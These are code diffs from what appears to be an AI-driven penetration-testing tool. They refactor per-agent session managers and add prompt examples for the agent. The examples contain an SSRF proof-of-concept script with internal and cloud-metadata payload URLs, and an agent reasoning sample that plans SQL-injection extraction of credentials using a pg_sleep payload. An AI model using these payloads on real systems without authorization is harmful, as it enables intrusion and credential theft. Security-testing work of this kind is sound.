- IMPORTANT (multiline): Put real line breaks in your code. Do NOT emit literal "\n" sequences — use actual newlines.
|
||||
- IPython magic commands are fully supported (%pip, %time, %whos, %%writefile, etc.)
|
||||
- Line magics (%) and cell magics (%%) work as expected
|
||||
6. CLOSE: Terminates the session completely and frees memory
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
import io
|
||||
import signal
|
||||
import sys
|
||||
import threading
|
||||
from typing import Any
|
||||
@@ -57,28 +56,6 @@ class PythonInstance:
|
||||
}
|
||||
return None
|
||||
|
||||
def _setup_execution_environment(self, timeout: int) -> tuple[Any, io.StringIO, io.StringIO]:
|
||||
stdout_capture = io.StringIO()
|
||||
stderr_capture = io.StringIO()
|
||||
|
||||
def timeout_handler(signum: int, frame: Any) -> None:
|
||||
raise TimeoutError(f"Code execution timed out after {timeout} seconds")
|
||||
|
||||
old_handler = signal.signal(signal.SIGALRM, timeout_handler)
|
||||
signal.alarm(timeout)
|
||||
|
||||
sys.stdout = stdout_capture
|
||||
sys.stderr = stderr_capture
|
||||
|
||||
return old_handler, stdout_capture, stderr_capture
|
||||
|
||||
def _cleanup_execution_environment(
|
||||
self, old_handler: Any, old_stdout: Any, old_stderr: Any
|
||||
) -> None:
|
||||
signal.signal(signal.SIGALRM, old_handler)
|
||||
sys.stdout = old_stdout
|
||||
sys.stderr = old_stderr
|
||||
|
||||
def _truncate_output(self, content: str, max_length: int, suffix: str) -> str:
|
||||
if len(content) > max_length:
|
||||
return content[:max_length] + suffix
|
||||
@@ -142,27 +119,52 @@ class PythonInstance:
|
||||
return session_error
|
||||
|
||||
with self._execution_lock:
|
||||
result_container: dict[str, Any] = {}
|
||||
stdout_capture = io.StringIO()
|
||||
stderr_capture = io.StringIO()
|
||||
cancelled = threading.Event()
|
||||
|
||||
old_stdout, old_stderr = sys.stdout, sys.stderr
|
||||
|
||||
try:
|
||||
old_handler, stdout_capture, stderr_capture = self._setup_execution_environment(
|
||||
timeout
|
||||
def _run_code() -> None:
|
||||
try:
|
||||
sys.stdout = stdout_capture
|
||||
sys.stderr = stderr_capture
|
||||
execution_result = self.shell.run_cell(code, silent=False, store_history=True)
|
||||
result_container["execution_result"] = execution_result
|
||||
result_container["stdout"] = stdout_capture.getvalue()
|
||||
result_container["stderr"] = stderr_capture.getvalue()
|
||||
except (KeyboardInterrupt, SystemExit) as e:
|
||||
result_container["error"] = e
|
||||
except Exception as e: # noqa: BLE001
|
||||
result_container["error"] = e
|
||||
finally:
|
||||
if not cancelled.is_set():
|
||||
sys.stdout = old_stdout
|
||||
sys.stderr = old_stderr
|
||||
|
||||
exec_thread = threading.Thread(target=_run_code, daemon=True)
|
||||
exec_thread.start()
|
||||
exec_thread.join(timeout=timeout)
|
||||
|
||||
if exec_thread.is_alive():
|
||||
cancelled.set()
|
||||
sys.stdout, sys.stderr = old_stdout, old_stderr
|
||||
return self._handle_execution_error(
|
||||
TimeoutError(f"Code execution timed out after {timeout} seconds")
|
||||
)
|
||||
|
||||
try:
|
||||
execution_result = self.shell.run_cell(code, silent=False, store_history=True)
|
||||
signal.alarm(0)
|
||||
if "error" in result_container:
|
||||
return self._handle_execution_error(result_container["error"])
|
||||
|
||||
return self._format_execution_result(
|
||||
execution_result, stdout_capture.getvalue(), stderr_capture.getvalue()
|
||||
)
|
||||
if "execution_result" in result_container:
|
||||
return self._format_execution_result(
|
||||
result_container["execution_result"],
|
||||
result_container.get("stdout", ""),
|
||||
result_container.get("stderr", ""),
|
||||
)
|
||||
|
||||
except (TimeoutError, KeyboardInterrupt, SystemExit) as e:
|
||||
signal.alarm(0)
|
||||
return self._handle_execution_error(e)
|
||||
|
||||
finally:
|
||||
self._cleanup_execution_environment(old_handler, old_stdout, old_stderr)
|
||||
return self._handle_execution_error(RuntimeError("Unknown execution error"))
|
||||
|
||||
def close(self) -> None:
|
||||
self.is_running = False
|
||||
|
||||
@@ -1,33 +1,41 @@
|
||||
import atexit
|
||||
import contextlib
|
||||
import signal
|
||||
import sys
|
||||
import threading
|
||||
from typing import Any
|
||||
|
||||
from strix.tools.context import get_current_agent_id
|
||||
|
||||
from .python_instance import PythonInstance
|
||||
|
||||
|
||||
class PythonSessionManager:
|
||||
def __init__(self) -> None:
|
||||
self.sessions: dict[str, PythonInstance] = {}
|
||||
self._sessions_by_agent: dict[str, dict[str, PythonInstance]] = {}
|
||||
self._lock = threading.Lock()
|
||||
self.default_session_id = "default"
|
||||
|
||||
self._register_cleanup_handlers()
|
||||
|
||||
def _get_agent_sessions(self) -> dict[str, PythonInstance]:
|
||||
agent_id = get_current_agent_id()
|
||||
with self._lock:
|
||||
if agent_id not in self._sessions_by_agent:
|
||||
self._sessions_by_agent[agent_id] = {}
|
||||
return self._sessions_by_agent[agent_id]
|
||||
|
||||
def create_session(
|
||||
self, session_id: str | None = None, initial_code: str | None = None, timeout: int = 30
|
||||
) -> dict[str, Any]:
|
||||
if session_id is None:
|
||||
session_id = self.default_session_id
|
||||
|
||||
sessions = self._get_agent_sessions()
|
||||
with self._lock:
|
||||
if session_id in self.sessions:
|
||||
if session_id in sessions:
|
||||
raise ValueError(f"Python session '{session_id}' already exists")
|
||||
|
||||
session = PythonInstance(session_id)
|
||||
self.sessions[session_id] = session
|
||||
sessions[session_id] = session
|
||||
|
||||
if initial_code:
|
||||
result = session.execute_code(initial_code, timeout)
|
||||
@@ -51,11 +59,12 @@ class PythonSessionManager:
|
||||
if not code:
|
||||
raise ValueError("No code provided for execution")
|
||||
|
||||
sessions = self._get_agent_sessions()
|
||||
with self._lock:
|
||||
if session_id not in self.sessions:
|
||||
if session_id not in sessions:
|
||||
raise ValueError(f"Python session '{session_id}' not found")
|
||||
|
||||
session = self.sessions[session_id]
|
||||
session = sessions[session_id]
|
||||
|
||||
result = session.execute_code(code, timeout)
|
||||
result["message"] = f"Code executed in session '{session_id}'"
|
||||
@@ -65,11 +74,12 @@ class PythonSessionManager:
|
||||
if session_id is None:
|
||||
session_id = self.default_session_id
|
||||
|
||||
sessions = self._get_agent_sessions()
|
||||
with self._lock:
|
||||
if session_id not in self.sessions:
|
||||
if session_id not in sessions:
|
||||
raise ValueError(f"Python session '{session_id}' not found")
|
||||
|
||||
session = self.sessions.pop(session_id)
|
||||
session = sessions.pop(session_id)
|
||||
|
||||
session.close()
|
||||
return {
|
||||
@@ -79,9 +89,10 @@ class PythonSessionManager:
|
||||
}
|
||||
|
||||
def list_sessions(self) -> dict[str, Any]:
|
||||
sessions = self._get_agent_sessions()
|
||||
with self._lock:
|
||||
session_info = {}
|
||||
for sid, session in self.sessions.items():
|
||||
for sid, session in sessions.items():
|
||||
session_info[sid] = {
|
||||
"is_running": session.is_running,
|
||||
"is_alive": session.is_alive(),
|
||||
@@ -89,40 +100,41 @@ class PythonSessionManager:
|
||||
|
||||
return {"sessions": session_info, "total_count": len(session_info)}
|
||||
|
||||
def cleanup_agent(self, agent_id: str) -> None:
|
||||
with self._lock:
|
||||
sessions = self._sessions_by_agent.pop(agent_id, {})
|
||||
|
||||
for session in sessions.values():
|
||||
with contextlib.suppress(Exception):
|
||||
session.close()
|
||||
|
||||
def cleanup_dead_sessions(self) -> None:
|
||||
with self._lock:
|
||||
dead_sessions = []
|
||||
for sid, session in self.sessions.items():
|
||||
if not session.is_alive():
|
||||
dead_sessions.append(sid)
|
||||
for sessions in self._sessions_by_agent.values():
|
||||
dead_sessions = []
|
||||
for sid, session in sessions.items():
|
||||
if not session.is_alive():
|
||||
dead_sessions.append(sid)
|
||||
|
||||
for sid in dead_sessions:
|
||||
session = self.sessions.pop(sid)
|
||||
with contextlib.suppress(Exception):
|
||||
session.close()
|
||||
for sid in dead_sessions:
|
||||
session = sessions.pop(sid)
|
||||
with contextlib.suppress(Exception):
|
||||
session.close()
|
||||
|
||||
def close_all_sessions(self) -> None:
|
||||
with self._lock:
|
||||
sessions_to_close = list(self.sessions.values())
|
||||
self.sessions.clear()
|
||||
all_sessions: list[PythonInstance] = []
|
||||
for sessions in self._sessions_by_agent.values():
|
||||
all_sessions.extend(sessions.values())
|
||||
self._sessions_by_agent.clear()
|
||||
|
||||
for session in sessions_to_close:
|
||||
for session in all_sessions:
|
||||
with contextlib.suppress(Exception):
|
||||
session.close()
|
||||
|
||||
def _register_cleanup_handlers(self) -> None:
|
||||
atexit.register(self.close_all_sessions)
|
||||
|
||||
signal.signal(signal.SIGTERM, self._signal_handler)
|
||||
signal.signal(signal.SIGINT, self._signal_handler)
|
||||
|
||||
if hasattr(signal, "SIGHUP"):
|
||||
signal.signal(signal.SIGHUP, self._signal_handler)
|
||||
|
||||
def _signal_handler(self, _signum: int, _frame: Any) -> None:
|
||||
self.close_all_sessions()
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
_python_session_manager = PythonSessionManager()
|
||||
|
||||
|
||||
@@ -131,5 +131,148 @@ H = High (total loss of availability)</description>
|
||||
- On success: success=true, message, report_id, severity, cvss_score
|
||||
- On duplicate detection: success=false, message (with duplicate info), duplicate_of (ID), duplicate_title, confidence (0-1), reason (why it's a duplicate)</description>
|
||||
</returns>
|
||||
|
||||
<examples>
|
||||
<function=create_vulnerability_report>
|
||||
<parameter=title>Server-Side Request Forgery (SSRF) via URL Preview Feature Enables Internal Network Access</parameter>
|
||||
<parameter=description>A server-side request forgery (SSRF) vulnerability was identified in the URL preview feature that generates rich previews for user-supplied links.
|
||||
|
||||
The application performs server-side HTTP requests to retrieve metadata (title, description, thumbnails). Insufficient validation of the destination allows an attacker to coerce the server into making requests to internal network hosts and link-local addresses that are not directly reachable from the internet.
|
||||
|
||||
This issue is particularly high risk in cloud-hosted environments where link-local metadata services may expose sensitive information (e.g., instance identifiers, temporary credentials) if reachable from the application runtime.</parameter>
|
||||
<parameter=impact>Successful exploitation may allow an attacker to:
|
||||
|
||||
- Reach internal-only services (admin panels, service discovery endpoints, unauthenticated microservices)
|
||||
- Enumerate internal network topology based on timing and response differences
|
||||
- Access link-local services that should never be reachable from user input paths
|
||||
- Potentially retrieve sensitive configuration data and temporary credentials in certain hosting environments
|
||||
|
||||
Business impact includes increased likelihood of lateral movement, data exposure from internal systems, and compromise of cloud resources if credentials are obtained.</parameter>
|
||||
<parameter=target>https://app.acme-corp.com</parameter>
|
||||
<parameter=technical_analysis>The vulnerable behavior occurs when the application accepts a user-controlled URL and fetches it server-side to generate a preview. The response body and/or selected metadata fields are then returned to the client.
|
||||
|
||||
Observed security gaps:
|
||||
- No robust allowlist of approved outbound domains
|
||||
- No effective blocking of private, loopback, and link-local address ranges
|
||||
- Redirect handling can be leveraged to reach disallowed destinations if not revalidated after following redirects
|
||||
- DNS resolution and IP validation appear to occur without normalization safeguards, creating bypass risk (e.g., encoded IPs, mixed IPv6 notation, DNS rebinding scenarios)
|
||||
|
||||
As a result, an attacker can supply a URL that resolves to an internal destination. The server performs the request from a privileged network position, and the attacker can infer results via returned preview content or measurable response differences.</parameter>
|
||||
<parameter=poc_description>To reproduce:
|
||||
|
||||
1. Authenticate to the application as a standard user.
|
||||
2. Navigate to the link preview feature (e.g., “Add Link”, “Preview URL”, or equivalent UI).
|
||||
3. Submit a URL pointing to an internal resource. Example payloads:
|
||||
|
||||
- http://127.0.0.1:80/
|
||||
- http://localhost:8080/
|
||||
- http://10.0.0.1:80/
|
||||
- http://169.254.169.254/ (link-local)
|
||||
|
||||
4. Observe that the server attempts to fetch the destination and returns either:
|
||||
- Preview content/metadata from the target, or
|
||||
- Error/timing differences that confirm network reachability.
|
||||
|
||||
Impact validation:
|
||||
- Use a controlled internal endpoint (or a benign endpoint that returns a distinct marker) to demonstrate that the request is performed by the server, not the client.
|
||||
- If the application follows redirects, validate whether an allowlisted URL can redirect to a disallowed destination, and whether the redirected-to destination is still fetched.</parameter>
|
||||
<parameter=poc_script_code>import json
|
||||
import sys
|
||||
import time
|
||||
from urllib.parse import urljoin
|
||||
|
||||
import requests
|
||||
|
||||
BASE = "https://app.acme-corp.com"
|
||||
PREVIEW_ENDPOINT = urljoin(BASE, "/api/v1/link-preview")
|
||||
|
||||
SESSION_COOKIE = "" # Set to your authenticated session cookie value if needed
|
||||
|
||||
TARGETS = [
|
||||
"http://127.0.0.1:80/",
|
||||
"http://localhost:8080/",
|
||||
"http://10.0.0.1:80/",
|
||||
"http://169.254.169.254/",
|
||||
]
|
||||
|
||||
|
||||
def preview(url: str) -> tuple[int, float, str]:
|
||||
headers = {
|
||||
"Content-Type": "application/json",
|
||||
}
|
||||
cookies = {}
|
||||
if SESSION_COOKIE:
|
||||
cookies["session"] = SESSION_COOKIE
|
||||
|
||||
payload = {"url": url}
|
||||
start = time.time()
|
||||
resp = requests.post(PREVIEW_ENDPOINT, headers=headers, cookies=cookies, data=json.dumps(payload), timeout=15)
|
||||
elapsed = time.time() - start
|
||||
|
||||
body = resp.text
|
||||
snippet = body[:500]
|
||||
return resp.status_code, elapsed, snippet
|
||||
|
||||
|
||||
def main() -> int:
|
||||
print(f"Endpoint: {PREVIEW_ENDPOINT}")
|
||||
print("Testing SSRF candidates (server-side fetch behavior):")
|
||||
print()
|
||||
|
||||
for url in TARGETS:
|
||||
try:
|
||||
status, elapsed, snippet = preview(url)
|
||||
print(f"URL: {url}")
|
||||
print(f"Status: {status}")
|
||||
print(f"Elapsed: {elapsed:.2f}s")
|
||||
print("Body (first 500 chars):")
|
||||
print(snippet)
|
||||
print("-" * 60)
|
||||
except requests.RequestException as e:
|
||||
print(f"URL: {url}")
|
||||
print(f"Request failed: {e}")
|
||||
print("-" * 60)
|
||||
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
raise SystemExit(main())</parameter>
|
||||
<parameter=remediation_steps>Implement layered SSRF defenses:
|
||||
|
||||
1. Explicit allowlist for outbound destinations
|
||||
- Only permit fetching from a maintained set of approved domains (and required schemes).
|
||||
- Reject all other destinations by default.
|
||||
|
||||
2. Robust IP range blocking after DNS resolution
|
||||
- Resolve the hostname and block private, loopback, link-local, and reserved ranges for both IPv4 and IPv6.
|
||||
- Re-validate on every redirect hop; do not follow redirects to disallowed destinations.
|
||||
|
||||
3. URL normalization and parser hardening
|
||||
- Normalize and validate the URL using a strict parser.
|
||||
- Reject ambiguous encodings and unusual notations that can bypass filters.
|
||||
|
||||
4. Network egress controls (defense in depth)
|
||||
- Enforce outbound firewall rules so the application runtime cannot reach sensitive internal ranges or link-local addresses.
|
||||
- If previews are required, route outbound requests through a dedicated egress proxy with policy enforcement and auditing.
|
||||
|
||||
5. Response handling hardening
|
||||
- Avoid returning raw response bodies from previews.
|
||||
- Strictly limit what metadata is returned and apply size/time limits to outbound fetches.
|
||||
|
||||
6. Monitoring and alerting
|
||||
- Log and alert on preview attempts to unusual destinations, repeated failures, high-frequency requests, or attempts to access blocked ranges.</parameter>
|
||||
<parameter=attack_vector>N</parameter>
|
||||
<parameter=attack_complexity>L</parameter>
|
||||
<parameter=privileges_required>L</parameter>
|
||||
<parameter=user_interaction>N</parameter>
|
||||
<parameter=scope>C</parameter>
|
||||
<parameter=confidentiality>H</parameter>
|
||||
<parameter=integrity>H</parameter>
|
||||
<parameter=availability>L</parameter>
|
||||
<parameter=endpoint>/api/v1/link-preview</parameter>
|
||||
<parameter=method>POST</parameter>
|
||||
</function>
|
||||
</examples>
|
||||
</tool>
|
||||
</tools>
|
||||
|
||||
@@ -1,22 +1,29 @@
|
||||
import atexit
|
||||
import contextlib
|
||||
import signal
|
||||
import sys
|
||||
import threading
|
||||
from typing import Any
|
||||
|
||||
from strix.tools.context import get_current_agent_id
|
||||
|
||||
from .terminal_session import TerminalSession
|
||||
|
||||
|
||||
class TerminalManager:
|
||||
def __init__(self) -> None:
|
||||
self.sessions: dict[str, TerminalSession] = {}
|
||||
self._sessions_by_agent: dict[str, dict[str, TerminalSession]] = {}
|
||||
self._lock = threading.Lock()
|
||||
self.default_terminal_id = "default"
|
||||
self.default_timeout = 30.0
|
||||
|
||||
self._register_cleanup_handlers()
|
||||
|
||||
def _get_agent_sessions(self) -> dict[str, TerminalSession]:
|
||||
agent_id = get_current_agent_id()
|
||||
with self._lock:
|
||||
if agent_id not in self._sessions_by_agent:
|
||||
self._sessions_by_agent[agent_id] = {}
|
||||
return self._sessions_by_agent[agent_id]
|
||||
|
||||
def execute_command(
|
||||
self,
|
||||
command: str,
|
||||
@@ -64,24 +71,26 @@ class TerminalManager:
|
||||
}
|
||||
|
||||
def _get_or_create_session(self, terminal_id: str) -> TerminalSession:
|
||||
sessions = self._get_agent_sessions()
|
||||
with self._lock:
|
||||
if terminal_id not in self.sessions:
|
||||
self.sessions[terminal_id] = TerminalSession(terminal_id)
|
||||
return self.sessions[terminal_id]
|
||||
if terminal_id not in sessions:
|
||||
sessions[terminal_id] = TerminalSession(terminal_id)
|
||||
return sessions[terminal_id]
|
||||
|
||||
def close_session(self, terminal_id: str | None = None) -> dict[str, Any]:
|
||||
if terminal_id is None:
|
||||
terminal_id = self.default_terminal_id
|
||||
|
||||
sessions = self._get_agent_sessions()
|
||||
with self._lock:
|
||||
if terminal_id not in self.sessions:
|
||||
if terminal_id not in sessions:
|
||||
return {
|
||||
"terminal_id": terminal_id,
|
||||
"message": f"Terminal '{terminal_id}' not found",
|
||||
"status": "not_found",
|
||||
}
|
||||
|
||||
session = self.sessions.pop(terminal_id)
|
||||
session = sessions.pop(terminal_id)
|
||||
|
||||
try:
|
||||
session.close()
|
||||
@@ -99,9 +108,10 @@ class TerminalManager:
|
||||
}
|
||||
|
||||
def list_sessions(self) -> dict[str, Any]:
|
||||
sessions = self._get_agent_sessions()
|
||||
with self._lock:
|
||||
session_info: dict[str, dict[str, Any]] = {}
|
||||
for tid, session in self.sessions.items():
|
||||
for tid, session in sessions.items():
|
||||
session_info[tid] = {
|
||||
"is_running": session.is_running(),
|
||||
"working_dir": session.get_working_dir(),
|
||||
@@ -109,40 +119,41 @@ class TerminalManager:
|
||||
|
||||
return {"sessions": session_info, "total_count": len(session_info)}
|
||||
|
||||
def cleanup_agent(self, agent_id: str) -> None:
|
||||
with self._lock:
|
||||
sessions = self._sessions_by_agent.pop(agent_id, {})
|
||||
|
||||
for session in sessions.values():
|
||||
with contextlib.suppress(Exception):
|
||||
session.close()
|
||||
|
||||
def cleanup_dead_sessions(self) -> None:
|
||||
with self._lock:
|
||||
dead_sessions: list[str] = []
|
||||
for tid, session in self.sessions.items():
|
||||
if not session.is_running():
|
||||
dead_sessions.append(tid)
|
||||
for sessions in self._sessions_by_agent.values():
|
||||
dead_sessions: list[str] = []
|
||||
for tid, session in sessions.items():
|
||||
if not session.is_running():
|
||||
dead_sessions.append(tid)
|
||||
|
||||
for tid in dead_sessions:
|
||||
session = self.sessions.pop(tid)
|
||||
with contextlib.suppress(Exception):
|
||||
session.close()
|
||||
for tid in dead_sessions:
|
||||
session = sessions.pop(tid)
|
||||
with contextlib.suppress(Exception):
|
||||
session.close()
|
||||
|
||||
def close_all_sessions(self) -> None:
|
||||
with self._lock:
|
||||
sessions_to_close = list(self.sessions.values())
|
||||
self.sessions.clear()
|
||||
all_sessions: list[TerminalSession] = []
|
||||
for sessions in self._sessions_by_agent.values():
|
||||
all_sessions.extend(sessions.values())
|
||||
self._sessions_by_agent.clear()
|
||||
|
||||
for session in sessions_to_close:
|
||||
for session in all_sessions:
|
||||
with contextlib.suppress(Exception):
|
||||
session.close()
|
||||
|
||||
def _register_cleanup_handlers(self) -> None:
|
||||
atexit.register(self.close_all_sessions)
|
||||
|
||||
signal.signal(signal.SIGTERM, self._signal_handler)
|
||||
signal.signal(signal.SIGINT, self._signal_handler)
|
||||
|
||||
if hasattr(signal, "SIGHUP"):
|
||||
signal.signal(signal.SIGHUP, self._signal_handler)
|
||||
|
||||
def _signal_handler(self, _signum: int, _frame: Any) -> None:
|
||||
self.close_all_sessions()
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
_terminal_manager = TerminalManager()
|
||||
|
||||
|
||||
@@ -19,33 +19,35 @@
|
||||
<examples>
|
||||
# Planning and strategy
|
||||
<function=think>
|
||||
<parameter=thought>I need to analyze the scan results systematically. First, let me review
|
||||
the open ports: 22 (SSH), 80 (HTTP), 443 (HTTPS), and 3306 (MySQL). The MySQL port being
|
||||
externally accessible is a high priority security concern. I should check for default
|
||||
credentials and version information. For the web services, I need to enumerate
|
||||
directories and test for common web vulnerabilities.</parameter>
|
||||
</function>
|
||||
<parameter=thought>Analysis of the login endpoint SQL injection:
|
||||
|
||||
# Analysis of tool outputs
|
||||
<function=think>
|
||||
<parameter=thought>The Nmap scan revealed 15 open ports, but three stand out as concerning:
|
||||
- Port 3306 (MySQL) - Database should not be exposed externally
|
||||
- Port 5432 (PostgreSQL) - Another database port that's risky when public
|
||||
- Port 6379 (Redis) - Often misconfigured and can lead to data exposure
|
||||
I should prioritize testing these database services for authentication bypass and
|
||||
information disclosure vulnerabilities.</parameter>
|
||||
</function>
|
||||
Current State:
|
||||
- Confirmed SQL injection in POST /api/v1/auth/login
|
||||
- Backend database is PostgreSQL 14.2
|
||||
- Application user has full CRUD privileges
|
||||
|
||||
# Decision making and next steps
|
||||
<function=think>
|
||||
<parameter=thought>Based on the vulnerability scan results, I've identified several critical
|
||||
issues that need immediate attention:
|
||||
1. SQL injection in the login form (confirmed with sqlmap)
|
||||
2. Reflected XSS in the search parameter
|
||||
3. Directory traversal in the file upload function
|
||||
I should document these findings with proof-of-concept exploits and assign appropriate
|
||||
CVSS scores. The SQL injection poses the highest risk due to potential data
|
||||
exfiltration.</parameter>
|
||||
Exploitation Strategy:
|
||||
1. First, enumerate database structure using UNION-based injection
|
||||
2. Extract user table schema and credentials
|
||||
3. Check for password hashing (MD5? bcrypt?)
|
||||
4. Look for admin accounts and API keys
|
||||
|
||||
Risk Assessment:
|
||||
- CVSS Base Score: 9.8 (Critical)
|
||||
- Attack Vector: Network (remotely exploitable)
|
||||
- Privileges Required: None
|
||||
- Impact: Full database compromise
|
||||
|
||||
Evidence Collected:
|
||||
- Error-based injection confirms PostgreSQL
|
||||
- Time-based payload: admin' AND pg_sleep(5)-- caused 5s delay
|
||||
- UNION injection reveals 8 columns in users table
|
||||
|
||||
Next Actions:
|
||||
1. Write PoC exploit script in Python
|
||||
2. Extract password hashes for analysis
|
||||
3. Create vulnerability report with full details
|
||||
4. Test if same vulnerability exists in other endpoints</parameter>
|
||||
</function>
|
||||
</examples>
|
||||
</tool>
|
||||
|
||||
Reference in New Issue
Block a user